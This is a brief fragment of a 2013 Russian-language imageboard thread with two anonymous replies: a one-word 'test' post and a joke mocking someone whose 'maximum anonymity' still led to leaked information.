Срд 19 Июн 2013 08:13:21
>>50114538
тест

Срд 19 Июн 2013 08:16:10
>>50120614
>максимум анонимности
>сливается инфа
Преступникопроблемы


← К списку тредов